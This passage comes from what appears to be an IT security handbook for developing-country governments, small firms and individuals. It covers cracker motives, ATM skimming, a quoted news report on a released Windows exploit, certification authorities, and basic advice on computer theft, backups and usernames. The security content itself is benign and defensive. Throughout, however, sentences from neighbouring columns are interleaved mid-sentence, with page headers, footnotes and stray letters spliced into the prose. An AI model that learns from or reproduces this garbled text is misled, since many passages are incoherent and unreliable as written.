his Crackers generally regard their activities as a victimless computer move around the screen and files open as if crime. What does it hurt, after all, if an account or a 21Associated Press bulletin, July 23, 2003. Information Technology Security Handbook INTRODUCTION 25 database is broken into, and nothing is altered or thieves installed what looked like an ATM machine in a P stolen? They discount the legal implications and the shopping center. When people tried to obtain money ART consequences of such actions. They also disregard the from it by entering their card and numeric passcode, the victim's feeling of insecurity that such actions are likely machine reported that it was unable to complete the to generate. The analogue in the real world is knowing transaction. However, it recorded the card number and that someone has broken in to your home and can do so passcode so that unauthorized withdrawals could be ONE again anytime; it is an intolerable feeling. made at a later time. In a variant of this method, thieves tapped legitimate ATM machines so that they Ironically, the Internet aids would-be security violators could record the information as transactions were being in an unfortunate manner. Some crackers build "break-in completed. Later, the information was used to make kits" that provide novice crackers the ability to employ unauthorized withdrawals. sophisticated tools in their efforts. Such tools are often posted in well-known Usenet News Groups, where they Although most visible cyber crimes have been traced to can be inspected and downloaded by anyone with individuals, organizations including governments, are access to the Internet. While many of these kits may be also capable of manipulating aspects of cyberspace for harmless, one is never sure, and it is certainly possible their own purposes. Organized crime may well have an to modify a so-called harmless kit to do real damage to interest in manipulating the network so as to cause the computers and accounts that are accessed with the results that are in their interest but also represent crim- kit. Here is a recent example of such activity: inal activity against others. For other organizations, it may be in their interest to manipulate the results of a "CERT Advisory CA-203-18 documents the latest poll, or even an election, to obtain falsified but favor- critical Windows security hole, while CNet reports able results for themselves. Some such groups are well that a Windows exploit for another flaw could pave funded and organized, and could in theory pursue such the way for a 'major worm attack': strategies intensively. A hacker group released code designed to exploit a It's clear that the potential benefits of our new digital widespread Windows flaw, paving the way for a major era are enormous. It's important that we protect those worm attack as soon as this weekend, security benefits by securing our physical environment, our researchers warned. The warning came Friday, after infrastructure, our computers, our communications links, hackers from the Chinese X Focus security group and our information resources. The first step in doing forwarded source code to several public security lists. this lies in understanding enough of the technology to The code is for a program designed to allow an make wise decisions on how to provide the required intruder to enter Windows computers. level of security. Many of us have multiple roles: we may use these resources as individuals, we may have a The X Focus program takes advantage of a hole in the responsibility for the digital systems and services in Microsoft operating system that lets attackers break in an organization, and we may be participating to help remotely. The flaw has been characterized by some government adopt and implement policies supporting security experts as the most widespread ever found adequate security. in Windows."22 In each of these roles, we have a responsibility to This trend toward attacks of increasing power by ascertain that adequate security exists. Unfortunately, relatively unsophisticated people is a long-term trend. security in a complex environment is often only as strong as its weakest link; we must work to ensure that Not all security violations involve computers and the the components over which we have some control are Internet. Automatic teller machines (ATMs) have been sufficiently robust to defend against the threats that used for theft of confidential information. In one case, we believe exist. (in the State of Connecticut in the United States) 22CNet News.com, July 25, 2003. 26 INFORMATION SECURITY AND GOVERNMENT POLICIES Importance of Security for SME's in intellectual property assets that are held (and perhaps Developing Countries sold) by the firm. To the extent that goods and services sold are information products, there is the possibility that While security is important for everyone, it is of special they will be replicated illegally and distributed either for importance for small and medium enterprises in devel- free or in the gray markets, where profits accrue to the oping countries. The rewards of being able to move into thieves and not the firm that produced the work. global markets with the assistance of ICTs can be signif- icant, but the risks of doing so in an insecure manner The most obvious example of illegal copying today can are substantial. be observed in the music industry, which is fighting the distribution of "pirated" recordings, often in CD format. Many businesses have already made the transition from The protection of digitally recorded intellectual property manual operations to computer-assisted management is an unresolved issue at the moment, though there has of the business. Stand-alone computers have been been considerable effort in the industry to come to used in many aspects of business in developed grips with new technology and distribution issues, both countries for some time. Along with the introduction in the United States and around the world. As long as of new computer resources, managers have had to learn near-perfect digital copies of information products can about operational issues such as backup, maintenance, be made easily and their origin is not traced back to a software updates, and computerized audit trails, all of specific sale, the gray market for entertainment products which have implications for computer, network, and will exist. The technology used in music piracy could data security. also be deployed in other circumstances; trade secrets or other confidential information could be lifted and With the introduction of network connections, and the distributed in ways that could damage a business possibility of engaging in e-business, the systems and severely. Valuable assets require adequate protection. It management processes deployed need to be viewed is possible to provide this protection, but the risks and differently. Stand-alone systems are generally product- methods will be different for a firm in an e-business centered or process-centered, including inventory, mode than they were for the firm operating as a tradi- ordering, and/or processes such as manufacturing, tional business, before e-commerce evolved. general ledger, and accounts payable and receivable. Successful on-line e-business systems are organized in Towards a New Model of Trust a different way; in order to succeed, they need to be designed as customer-centric, with the system tracking The new digital environment requires us to re-evaluate the customer's progress through a search for and evalua- our notions of trust. In the real world we use a variety tion of products, placement of an order, completion of measures to decide how much to trust a person, a of the financial transaction, and tracking of the sale process, or an organization. We have our intuition, shipment. Product and process issues are still important, which is based upon past experience and match what but now they are subservient to the primary need to we observe with what we have experienced. In making track the customer's journey through the business's web such decisions, we assess a person's words, absorb site and to assemble and execute any transactions that non-verbal communications, and observe events in the customer specifies and submits on-line. Such a a rich environmental and informational context. redesign is essential for success, but requires an altern In an exchange of information in cyberspace, most ative approach to customer transaction management, an non-verbal elements of communication are missing. approach that, if implemented without caution, may When we receive a piece of electronic mail or read open the door for new forms of security breaches. a web page, we cannot always tell if the information is accurate and if we see that it is not correct, we do Small and medium enterprises should be aware that the not know whether the errors are the result of negligence reorientation of business systems for deployment on the or whether there is a deliberate effort to deceive us. Internet involves new types of risks. One type of risk, in In the absence of other information, we do not know particular, is new: the possible compromise or theft of if the author is the person that he or she claims to be. Information Technology Security Handbook INTRODUCTION 27 Deception occurs in the real world too, of course, but it Governments have a role in ensuring that adequate P is generally easier to determine the truth of a situation mechanisms exist so that new trust models are viable ART with physical actors and real locations. and helpful for its inhabitants. Small and medium sized enterprises, in particular, depend upon the existence of Fortunately, some help is on the way in cyberspace trust when doing business electronically. In some coun- through the concept of a certification authority. This is tries, governments believe that government agencies ONE an authority that is formally recognized as providing should act as certification agencies, either exclusively or authentication for the identity of an individual or not. In other countries, governments believe that the organization. This concept exists in the real world as certification authority function should be left to the pri- well; if you hold a national passport, your government vate sector. Regardless of the specifics of the implemen- presumably has authenticated your identity and the tation, the goal is clear. Government policy can facilitate passport is the token that you can present to prove it. trust mechanisms that will enable its inhabitants, indi- Similarly, if you have a license to drive a motor vehicle, vidual and organizational, to participate in e-commerce a regional or national agency of your government has activities on an equal footing with other countries. issued the license, both authenticating you and also granting you the privilege of driving a vehicle. Credit Summary card companies authenticate you through the issuance of credit cards. Your employer or school may authenti- Digital technology provides us with exciting new tools cate you through an identification card. This card may that can have a major impact on education, health, authorize your access to certain services that they are commerce, and other sectors of civil society. providing for employees or students in their domain. This technology benefits all countries and people, but Clearly, there are quite a few certification authorities in has a special attraction for developing countries in that the real world. Generally each of these authorities has a it can help to accelerate their integration into the world special purpose in authenticating you, although the economic community. The technology is still in its proof of authentication may be used for broader purposes. infancy, but it is developing rapidly. Unfortunately, as The thoroughness of the authentication differs from with other technology developments, the Internet can authority to authority; some may require detailed proof be used for good or evil. As we have seen, there are of your identity, while others may accept what you say crackers and cyber criminals using it to attack individual without validation. users and all types of organizations. Certification authorities in cyberspace share these prop- The notion of safe computing, or being "cyber safe," is erties. Various levels of certification provide for differ- an important one. The examples in this chapter, the rate ent degrees of assurance that the certification is cor- of incidents reported to the CERT, and the new incidents rect. Multiple certification authorities exist in cyber- reported in the press on a daily basis, show why it is space, although it's more likely that one certification important to be aware of security issue and why you will be sufficient for most or all purposes. In addition, should take steps to ensure that your business and per- with electronic certification, certificates can be 'signed' sonal computers and data are protected. This Handbook electronically in a way that provides certainty that the contains a set of current "best practices" in security certification transmitted is genuine and accurate. Such a that may assist you in implementing the policies and system of certification is more formal and quantitative procedures that are relevant to your specific situation. than the intuitive and experiential methods used in the In addition, this Handbook also includes ample refer- real world. In the digital world, we need to rely on more ences to other materials, both electronic and print, that formal methods to establish the trust required to sup- cover specific aspects of IT security. There are links to port business and financial transactions conducted over professional organizations that focus on IT security electronic networks. issues as well; all of these resources will be useful to individuals and organizations seeking to deepen their knowledge of security in a networked world. 28 INFORMATION SECURITY AND GOVERNMENT POLICIES The stakes are high for developing countries. Foreign direct investment, confidence, and trust in a developing country depend upon a secure and effective implementation of technology and infrastruc- ture. Governments, organizations, and individuals all have a part to play in assuring the security of the country's electronic and information assets. Knowledge of the threat is paramount; appropriate action based on such knowledge should produce an environment of trust that is conducive to progress and to realizing the benefits of the new digital age for as many inhabitants of Earth as possible. 29 P A R T T W O S E C U R I T Y F O R I N D I V I D U A L S CHAPTER 1. INTRODUCTION TO SECURITY FOR INDIVIDUALS CHAPTER 2. UNDERSTANDING AND ADDRESSING SECURITY CHAPTER 3. KEEPING YOUR COMPUTER AND DATA SECURE CHAPTER 4. KEEPING YOUR OPERATING SYSTEM AND APPLICATION SOFTWARE SECURE CHAPTER 5. MALICIOUS SOFTWARE CHAPTER 6. SECURING SERVICES OVER NETWORKS CHAPTER 7. TOOLS TO ENHANCE SECURITY CHAPTER 8. PLATFORM SPECIFIC ISSUESADDENDUM 1. INTRODUCTION TO ENCODING AND ENCRYPTION ADDENDUM 1. INTRODUCTION TO ENCODING AND ENCRYPTION ADDENDUM 2. TCP/IP ADDENDUM 3. MINI-GLOSSARY OF TECHNICAL TERMS 30 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 1. of your computing environment. However, if you follow INTRODUCTION the guidelines in this Handbook and survey the resources available to you, you will be able to minimize the risks and develop appropriate responses to the evolving world Part 2, Security for Individuals, is aimed at all computer of information technology. users, from novices to experts and should serve as a primer on how to use your personal computer safely. Covering all of the issues related to security for individuals Safe computing is possible, but it takes knowledge, would take hundreds of pages. Most people do not have vigilance, and care. The language in this section will the interest or time to read such a complete study. include a certain degree of technical jargon; in general, This summary provides the information required for some technical terms are defined in the mini-glossary a typical user to understand and implement a at the end of Part 2; they also appear in the full reasonable degree of security on his/her computer. Glossary in Annex 1 of this Handbook. At times, the material presented in this Handbook may over-simplify some of the more complex issues. The first step in devising a security strategy is to The bibliographies provided in the Annexes offer understand what "safe computing" means. If you references to print resources, electronic resources, practice safe computing, you are seeking to ensure that: and organizations that will aid the user in further · your data and programs will not be altered or study of IT security issues. disappear unless you request it; · your computer and programs will behave the way their designer intended (with the exception of software bugs which are unintended flaws in program code); · no one will use your computer, your data, or your network without your permission; · you will not unknowingly spread computer viruses; · you will not be annoyed as much by unwanted advertisements (spam); · no one will watch every move you make on your computer; · no one will capture any of the data that goes over your wired or wireless network; · no one will steal your usernames or passwords on systems or sites that you access; · if you enter credit card numbers or bank account information online, the data will be reasonably secure (at your end of the connection; obviously you have less control over what happens at the other end of the connection). In the personal computer context, if you ignore security issues, the results can range from annoying but costless, to time-consuming and expensive. In a professional computing context, the problems caused by unsafe computing could jeopardize your business. In either case, someone must take responsibility for assessing the risks, developing a security plan, and executing that plan. Even with detailed knowledge of information technology (IT) security issues, you will not be able to control all aspects Information Technology Security Handbook SECURITY FOR INDIVIDUALS 31 CHAPTER 2. In some cases, they are operating for personal UNDERSTANDING AND ADDRESSING gain (stealing credit card information, engaging in SECURITY fraudulent transactions). In any case, these people can cause inconvenience and damage; in extreme At a Glance cases they may createserious problems for individuals and businesses whose data has been compromised. Since the Internet is available to users worldwide, This chapter evaluates why computer and network it can be complicated, if not impossible, to trace security are necessary. It addresses the impact of where the attacks are coming from and to stop the security breaches and it assesses the initial measures intruders permanently. required to counter such breaches. The chapter also includes a list of definitions of technical terms; P Why is security lacking? ART additional terms are defined in Annex 1. Why are Security Measures Required? Software programs are often developed without a focus on securing them. This happens for several reasons: TW In the early days of computing on shared systems, o Ignorance ­ the programmer or designer did not there were usernames, but no passwords. Passwords know about the need for security; O were added once the first malicious (or curious) users o Low priority ­ until recently, security issues did not began to abuse the ability to logon via username only. have the visibility that they now do. As a result, Today, there are a number of reasons to think about even people who knew about security issues chose computer and network security: to ignore them; o Time and expense ­ some people think that it is · The value of your investment in hardware more expensive and time consuming to design, code, equipment and software programs. Computers and and test for security issues during the software software packages are expensive. Replacing them development process; and may be costly and difficult. Even if you do not lose o Sloppiness ­ in some programming efforts, the same the actual hardware and software, security problems mistakes are made repeatedly, some of these mis can require a re-installation of all software programs takes make security breaches possible. and then re-configuration to meet your specific needs. This can be time-consuming, if not impossible, · People are innovative and motivated individuals will for someone with only a moderate degree of find ways to circumvent security or to discover errors technical knowledge. that create security exposures. · The value of your business data. This data could · Normal users (potential victims of security breaches) include your customer lists, financial projections, are not sufficiently aware of the threats around them or proprietary programs that you have written. and do not make an effort to follow proper procedures for securing their data and their systems. · The value of your personal data. Your personal data may not have any clear monetary value, but a loss · Some users may be aware of security issues, could be expensive (see later definition of identity but simply do not take them seriously ­ they assume theft), and you should consider how much time it that an attack will not be launched against them. may take to recreate the information. · The threat of computer criminals. As technology has advanced, a class of people who take advantage of networked computers to steal data has emerged. In some cases, they are operating for benign (or malicious) kicks or to prove to themselves or to their friends that they can do it. 32 INFORMATION SECURITY AND GOVERNMENT POLICIES Assessing the Threat and the Cost of Loss ... you received a bill for a credit card that you do not own, but the bank issuing the card is In order to understand how important security is to you, convinced that you applied for it. (And they you may wish to consider a number of "what if" questions. have proof of "your" application.) Imagine each of the security incidents listed below and try to assess the likely results of the incident. All of these situations highlight why computer security is important. Once you understand that The key questions that you must answer are: security is important to you, the next step is to assess what a good security plan will entail: · Could you recover from the incident? · How much time would it take? · Will it cost you anything to implement security · How much money would it cost? measures? · How would it impact your business? · How much time will it take? · What hidden costs would there be (including loss of · How inconvenient will it be? status or authority)? · Are there things that you like to do on your computer that will become difficult or impossible? Here are a few possible security incidents: · Can you put the security measures in place yourself or will you need help from others? What if... ... someone broke into your home or office and stole These are important questions because you need your computer. For added impact, they might also take to approach security with a solid understanding the backup disks found near the computer. of the costs in terms of money, time, and inconven- ience. Without this knowledge, you might become ... all of the data on your machine was erased? discouraged in the process of securing your system and perhaps you would abandon the project, leaving ... all of your data was stolen. This data might include: yourself unprotected. your bank account information, a list of your user- names and passwords for web sites where you make Will it cost you anything to become secure? online purchases, an important report that you are writing for work, or a school assignment that is due Many of the paths to good security do not require tomorrow and is worth 50% of the course grade. specific products and those available commercially ... someone watched and memorized everything are fairly inexpensive. Even virus-checkers, that you were doing on your computer? When you the most common purchased security product, type a credit card number, they know it. are available as freeware. Some organizations that When you browse a web site, they know it. offer freeware products are listed in the Annexes. When you log onto a web site or system, they are able to capture your username How much time will it take? and password. You will need to devote some time to implementing ... your computer kept crashing when you were and following security measures, although this commit- working on an important, time-sensitive project? ment should not be overwhelming. In short, you will need to install the proper software and perform ... you sent a malicious computer virus to everyone some routine maintenance tasks on a regular basis. in your address book? How inconvenient will it be? ... your telephone bill arrived and showed that you owe the phone company more than your How inconvenient it will be depends on your point monthly salary for calls that you did not make? of view. In a security mindset, you have to think Information Technology Security Handbook SECURITY FOR INDIVIDUALS 33 about what you are doing and you will not presume · Many security alerts are aimed at the computer that everything is safe. For example, if someone sends professional (although this is changing as the world you an attachment, you will decide whether you should becomes more security-conscious). A novice user open it or not. However, this level of caution is taken may not know how to access these alerts. If a new in other aspects of life. It is more convenient to cross a user does receive the alerts, he or she may not be street whenever and wherever you wish. Nevertheless, in able to understand them or take appropriate actions many places, it makes sense to check that there are no in response to them. Occasionally, you may receive cars coming before you step into the road. malicious spam claiming to be a security update from Microsoft that contains an "update" attach- Are there things that you like to do that will be ment. The mail, of course, is not from Microsoft difficult or impossible? and the attachment is typically a dangerous virus. P · In environments where there are a large number ART Yes, you will have to modify your actions to some of machines (businesses, schools, government offices), extent. Opting for increased security will prompt you it makes sense to have a system administrator handle to be conscious of potential problems and to avoid some aspects of security. them whenever possible. Contemporary software TW packages have many attractive capabilities, however, If you do choose to share the tasks of securing using certain features, especially those that enhance your systems with others, you should put a good O networking and messaging, can make you vulnerable communication plan in place. More information will to attack. For example, you might find a web site be provided on systems administration in other parts that offers a service that you want to use. of this Handbook. However, assigning clear However, to access the service, you must allow it responsibilities for security procedures to a to download and run a program on your computer. designated individual or group of individuals If you are not sure that the people who operate is an important part of the security plan. the service are trustworthy, it may be better not to download the program. Deciding on a personal security plan Can you put the security measures in place yourself There are many programs that address a range of or will you need help from others? computer security needs. Once you understand the threats and decide on what kinds of risks you would In theory, you can be fully responsible for all aspects like to minimize or eliminate, you can take steps to of security, but in practice, it may be better to share put a personal security plan in place. After assessing the responsibilities with others. the issues of cost, time, and inconvenience, you may decide that there are some types of threats that · Updating software programs and patches, you will live with, at least for the time being. a necessary part of being secure, is often bandwidth Your security plan will rely, to a certain extent, intensive. For someone connected to the Internet on software programs, but it should also include with a link running at megabit speeds, this is not a procedures, rules, and self-discipline. problem. However, in developing countries, band- width is often severely restricted and sometimes Good security is a result of multiple barriers or layers. very expensive. Dialup connectivity, while sufficient Each layer will stop certain kinds of threats. If you use for downloads, may result in high costs for connec- a variety of barriers, you will be more successful in tions of a long duration. It may be better to have eliminating a variety of problems. You can use the one person download updates for common software analogy of driving a car; what do you need to do to and then to distribute copies locally. Unfortunately, reduce the chance that you will have an accident? this is often not as convenient as having each user Some of the techniques are: work directly online. 34 INFORMATION SECURITY AND GOVERNMENT POLICIES · Keep the car in good repair; arise from human error. However, if you study and follow · Drive carefully; a set of best practices in security with diligence and care, · If the manufacturer alerts you that there is a you are improving your chances at operating your system safety-related defect in the car, get it fixed quickly; securely. It also helps to stay current with the field · Pay attention when you drive, as other drivers may through web site research and the mailing lists of cause problems for you; respected computing organizations, some of which are · If you read in the newspaper that a bridge is broken, listed in the Annexes. Such research may help guide your do not drive over it. security practices, particularly when new or unusual circumstances are present. None of these techniques alone will keep you safe, but by employing all of them, you will be more likely to avoid an accident. In developing a good security plan, one must take a number of partially redundant steps. Consider how you might protect a valuable piece of jewelry. You keep the jewelry in a locked box, inside your locked house, and you have an insurance policy that will replace the jewelry if it is stolen. So you have several levels of protection. Any one of these in theory would protect you from loss, but it is wiser to take all precautions. That way, if one of the methods should fail (perhaps there is an untrustworthy workman in your house ­ so the locked door will not help), there are still safeguards in place. The principle that needs to be understood is that virtually all security techniques can and will fail occasionally, either due to design problems, poor implementation, or human error. This applies to tools such as virus checkers, encryption and passwords. Any tool may fail at times and you should never rely on a single method to save you from disaster. The Role of the User in Security The primary user of a computer clearly has a large role to play in ensuring that the computer and its software are set up with a good degree of security. In addition, other users of that computer also have a role to play in ensuring that safe computing practices are followed carefully. As we will see, one of the greatest threats to safe computing is a user who does not understand or is not sufficiently diligent about security. Security is an Art, not a Science There is nothing guaranteed in trying to secure your computer and network. There are always new bugs, new forms of attack, and new opportunities for breaches that Information Technology Security Handbook SECURITY FOR INDIVIDUALS 35 CHAPTER 3. Rule 1: Think about computer theft before KEEPING YOUR COMPUTER AND DATA it happens. SECURE Having your computer stolen is certainly inconvenient. At a Glance It may also be expensive if you have no (or insufficient) insurance. In some cases, the loss of data could expose your business or personal secrets to others. In extreme This chapter investigates ways in which you can keep cases, a stolen computer could put you out of business. your computer physically secure and ensure that its Fortunately, by following a number of simple and programs and data are protected from loss. Topics inexpensive measures, you can dramatically reduce include physical security, backups, and authentication the chance that your laptop or desktop will be stolen. through the use of usernames and passwords. P There are two main preventive techniques: make your ART Introduction computer difficult to steal and/or make it less desirable for those who would want to use it. One of the best ways to master the concepts of Make it difficult to steal and access TW information security is to take a rules-based approach. Starting with Physical Security, the next few chapters There are several ways to prevent a thief from taking O in Part 2 will take you through the basics of setting your computer: up security procedures for your personal computer or those of your colleagues, if you work in a small group. · Ensure that the place where you keep the computer Information on the technical aspects of security for is secure. It can be locked up in a room or it can be larger organizations or more experienced users is watched by your colleagues, if you work in an office featured in Part 5 of this Handbook. If you are with many employees. Don't leave your computer comfortable with the concepts introduced here, unattended in public places such as airports. you may decide to build on your knowledge by consulting Part 5 ­ Security for Technical · Use an alarm system, if it is likely that someone Administrators. might break into your office at night, for example, Physical Security when no one is around. · Consider securing the computer to a desk or pipe The first step is to ensure that your computer is or other immovable object using heavy wire cable or physically secure. This may be a trivial or non-trivial chain. This method is often used in semi-public areas exercise, depending on what you own, where it is kept, such as libraries or schools. Many computers have a and how critical the computer and data are. convenient place to connect such a tie-down. Virtually all laptops have a connection point for a Computer Theft security cable; special cables and locks are sold for them. Computer theft is a growing problem. Computers, particularly laptops, are often very easy to steal and · If the computer has a lock to prevent the case from difficult to recover. If the thief is not interested in being opened, use it. You can also buy special screws using the computer himself, there is a strong market that cannot be undone easily. for used computers, stolen or otherwise. Some thieves do not even bother to steal the entire computer and · If there is potentially valuable information on your monitor, but will take certain parts, perhaps the computer (business data, personal information), you memory or the processor. Both items are marketable, should consider restricting logical access to it when simple to conceal and transport, and very difficult you leave it in hotel rooms or other unattended (if not impossible) to trace. locations. Logical access means actual use of the computer once you have physical access to it. 36 INFORMATION SECURITY AND GOVERNMENT POLICIES Robust logon passwords and password-protected Data can be corrupted or lost for a number of reasons. screen-savers are a good start in this direction. Some of the more common ones are: (See the section on Authentication later in this chapter). · Accidentally deleting a file; · Accidentally storing a new file under the same name · Laptops and PDAs (Personal Digital Assistants) are as an old one, wiping out the old one; small and easily lost. Get in the habit of putting · A misbehaving program that alters or corrupts your them away immediately when they are not in data; active use. · A misbehaving program that deletes your data; · A rogue program (perhaps a virus) that alters, over Make it less attractive to take writes or deletes your data; · A hardware failure (perhaps in the hard disk, or its Few people will want to buy a used computer if it is controller, or the processor or power supply) that obvious that it was stolen. A simple and inexpensive destroys data; way to make it less attractive to would-be purchasers is · A fire burns your computer or the water that is used to identify your property with non-removable tags or to put out the fire renders the computer useless; mark the equipment with paint. The markings can · The entire computer is stolen. include your name or other identifying information. If you use this method, do not get any paint in ventila- Creating backups is one solution to all of these prob- tion slots or other openings. Be aware that marking the lems. A backup is a copy of a file, or set of files, trans- computer case can void your warranty. ferred onto a floppy disk or CD-ROM and put away for safekeeping. If the original file is inadvertently deleted Computers are delicate or corrupted, the backup can be retrieved and the origi- nal file can be replaced. Computers are particularly sensitive to dust and rough handling. If you operate computers in dusty environ- Backups can be very simple, (e.g. a floppy disk in ments, they should be cleaned regularly, with extra care your desk drawer) or they can be exceedingly complex. taken that ventilation openings are not blocked. Many backup software packages will let you copy every Computers are also sensitive to drops and bumps. file on your computer onto a magnetic tape or a series of CD-ROMs. If your computer is lost or stolen, you can Other aspects of physical security buy a new computer and the backup system will restore all of your files and applications on the new computer, If you open up your computer to install new hardware, assuming that the architecture of the new computer don't ignore the warnings about reducing electrostatic is similar to that of your old one. shocks ­ making sure that your body is grounded is essential. Bugs, accidents, natural disasters, and attacks on your system cannot be predicted. Often, despite Using Backups to Protect Your Data your best efforts, they can't be prevented. However, if you have good backups, at least you won't lose In the last section, we addressed physical security. In this your data and, in many cases, you will be able to section, we will consider a different issue ­ ensuring that restore your system to a stable state. Even if you your data and your programs are secure. How do you lose your entire computer, with a complete set of protect your computer data from corruption or loss? backups you can restore the information after you purchase or borrow a replacement machine. Of course, this will only work if the backups were stored away Rule 2: Make backups regularly and take steps to from the computer and not lost along with the computer. ensure that they will survive if your computer is physically threatened. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 37 Here are some reasons why backups are a key Theft element in computer security: Computers are easy to steal and easy to sell. Not only User error should you make a backup, but you should also take it out of your computer and store it in a safe place; there People accidentally delete their files. With graphical are many cases where backups were stolen along with user interfaces, it's all too easy to accidentally drag the computer system. a file or folder to the wrong place. Creating periodic backups makes it possible to restore files that have Natural disaster been deleted accidentally, protecting you from "finger-failure" mistakes. Floods, earthquakes, and fires are all effective at P destroying the places where we keep our computers. ART Hardware failure Here too, it is important to keep backups off site. Hardware breaks from time to time, often destroying Other disasters data in the process. Disk crashes may destroy TW the complete disk, but if you have a backup, Sometimes Mother Nature isn't to blame: gas pipes leak you can restore the data onto a new drive and cause explosions, coffee spills through ventilation O or system. holes, computers may get dropped or knocked over. In each case, backups can prevent a misfortune from Software failure turning into an irrecoverable situation. Many application programs, including Microsoft Word, With all of these different uses for backups, it's not Excel, and Access, have been known to corrupt their surprising that there are many forms of backups in use data files on occasion.23 If you have a backup and your today. In fact, the perfect backup to recover from one application program suddenly deletes half of your of these problems might be useless for another. It is 500 x 500-cell spreadsheet, you will be able to useful to remember the multi-layered defense concept recover your data. and employ several forms of backup systems to cover the range of risks that you face in your home or office. Electronic break-ins and vandalism Here are a few types of backup methods to Computer attackers and malicious viruses frequently be considered: alter or delete data. Your backups may help you recover from a break-in or a virus incident. · Copy your critical files to a floppy disk or a high-density removable magnetic or optical disk. Archival information · Copy your entire disk to a spare or "mirror" disk or copy a disk to a folder/directory on the same disk if Backups provide archival information that lets you there is sufficient room. Obviously this will not help compare current versions of software and databases for catastrophic types of failure, but it does give you with older ones. This capability lets you determine what a copy in case of accidental deletion. you've changed, intentionally or by accident. It also · Make periodic compressed archives of your important provides a valuable resource if you ever need to go files.24 You can keep these backups on your primary back and reconstruct the history of a project. system or you can copy them to another computer, possibly at a different location. 23This statement is not meant to imply that these products have more such problems than others ­ they are listed only because they are the most popular applications used by users. 24Examples of compressed archives include "zip" and "tar" files that can contain very bulky information in a dense form. They are "unzipped" and individual files may be called up through fairly simple procedures. There are a number of vendors and some freeware available for file compression. 38 INFORMATION SECURITY AND GOVERNMENT POLICIES · Back up your files over a network or over the Internet a) Unless you have a massive amount of to another computer. personal data, back up all of your data · If you want high security against hard-disk failure, periodically, (every few months, for example). you may consider having two hard disks in your b) If you have a lot of personal data, you may computer and use hardware/software that duplicates consider backing it all up periodically and, at everything that is on the first disk on the second one more frequent intervals, back up only the files as well. If you do this, you still need regular backups that have changed since the last full backup. to protect against other types of problems. This is called an incremental backup. In this case, to restore a file or files, you will What Should You Back Up? need the last full backup plus the last incremental backup. There are two approaches to computer backup systems: There are other variations of these back up methods. 1. Back up everything that is unique to your system Typically, backup utilities offer advice in their instructions except the application programs. This primarily on how to use their products. includes your data files, but it should also include all of the files that tailor your operating system Where should I keep my backup copies? and your applications to you. It may be somewhat challenging to figure out where all of these files The answer to this depends on how you may use the are kept and it is difficult to know whether it is backups. If you are trying to protect your system from safe to restore them later without making other theft or fire, the backups must not be stored near your critical changes. However, you may choose to keep computer system. Ideally, they should be located all of your data files in a few major directories or far enough away that natural or man-made disasters folders. This way, you can make backups that only affecting the system do not affect the backups. However, contain your unique work. if you will use your backups for recovering data that has been deleted or altered accidentally, then you will want 2. Back up everything. With an image backup, to keep them in a more convenient location. depending on the utility you use to make it, you can restore the system in its entirety. One solution is to keep the full backups off site and You can also restore individual files or incremental backups nearby. Another is to keep the most directories/folders selectively. recent data backup nearby and a less recent copy off site. Some people make two copies of every backup, so We recommend both approaches. they can keep one full copy on site, and one farther away. 1. Make a complete image backup as soon as Remember, if you have data on your computer that your system is set up and back the system someone may want to steal, they can steal it from up periodically, perhaps once every several the backup as well. So it is important to protect the months. physical security of your backup, just as you protect the computer itself. 2. On a more regular basis, you should back up your personal data. Depending on the backup utility Will I be able to read the backup? that you use, there are several basic methodologies: There are a number of reasons that you will not be able to read a backup when you need it. Among them are: · The copy is too old or is physically damaged. This is most likely to occur with floppy disks or other magnetic media. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 39 · The device that wrote it was poorly adjusted and are better than nothing. This is another example therefore what was written cannot be read. In this of how good security is composed of multiple, case, it may be readable by the same device that partially redundant measures. wrote it. Backing up purchased software · Media failure. Media failure was common on old floppy disks. It was not unusual to create a disk If the license allows it, always make a copy of software that could not be read, even few days later. CD-ROMs and use the backup for routine installation and Optical disks (such as CD-Rs) have been thought maintenance operations. of as extremely stable. However, a recent study of CD-R reliability has indicated that lower quality CD-Rs The most important thing about backups P may not be readable in as little as two years after ART they are written. The most important thing about backups is that you create them regularly. Many people avoid the trouble of It is always good practice to try to read a backup, making backups. They may have even suffered previous preferably on a different device than the one that wrote losses due to insufficient backups, but they feel that TW it, to ensure that it is readable. If you write backups to they will not get hit again. Avoid risk and make regular removable magnetic disks (floppy, zip), make sure they backups! O are clean and reasonably new. Authentication Some people keep their backups for a long time. It is amazing how often you really want to reuse a copy of Authentication allows your computer or a distant web a document or image or program that you had several site to know who you are. It also should prevent other years ago. If you keep backups for a very long time, you people from pretending they are you. Typically, you will need to consider the possibility of media obsolescence. be known by a user identification and password, The data stored on a 5 _" floppy disk from the 1980s although there are many variations on this theme. may still be there, but will you be able to find a com- The challenge is to make your user identification and puter with a 5 _" floppy drive? password combination hard to guess, so that attackers cannot figure it out. At the same time, it should be How many copies should I keep? memorable enough so that you don't forget it or feel the need to write it down next to the computer. If you Let's say that you make a backup once a week, so if you use computers and the web frequently, you will have have some catastrophic failure, you will not lose more many usernames and passwords. If they are all written than one week's work. These backups are good from a in an obvious place near your computer, the usernames security standpoint, but over time they will take up and passwords are not very secure. space. How many of these backups should you keep? If you are using CD-Rs as the backup media, there is no User Identification reason to discard them quickly, as they are small and cannot be reused. If you are using magnetic disks or Most systems that want to identify you will either CD-RW, then they can be reused. But you should always assign or ask you to select a "User Identification." It keep several backup copies. In the above example, you goes by many names: username, userid, member number, might keep the most recent four copies. member name, etc. In this discussion, we will use the term username. Some systems will use your e-mail Why is this good practice? What possible reason would address as your username. In fact, your e-mail address there be to keep the copies from the past month when is a specific example of a username. Systems often have you have the more up-to-date copy from last week? The rules about how the username should be composed. reason is simple: it is always possible that the copy you made most recently is bad or will be lost, or stolen. The · Some systems limit the length of the username, for copies from last month are not as complete, but they other systems, the length is effectively unlimited. 40 INFORMATION SECURITY AND GOVERNMENT POLICIES · In some cases, any printable character is allowed in Passwords the username. In others, you may be limited to letters and numbers and perhaps a few punctuation Rule 3: Select passwords that you will be able to marks. remember but will be very difficult for someone else to guess. · Some systems ignore upper and lower case, while others treat them as different characters Although usernames are often given to you without (an "A" is not the same as an "a"). offering you a choice or are likely to be publicly known (such as your e-mail address), passwords can nearly If the system or web site does not give you a choice, always be set by you. Their form should make it difficult then it will decide what your username is and you will for an unauthorized person to access your account. be required to use this name. However, in the cases where you can select your own username, what are the When passwords are stored on the host system, they are criteria that you should consider? Sometimes, there are usually encrypted, so someone looking at the disk can- competing criteria, not all of which can be met at the not see your password. In some cases, they can be same time. decrypted by someone who knows 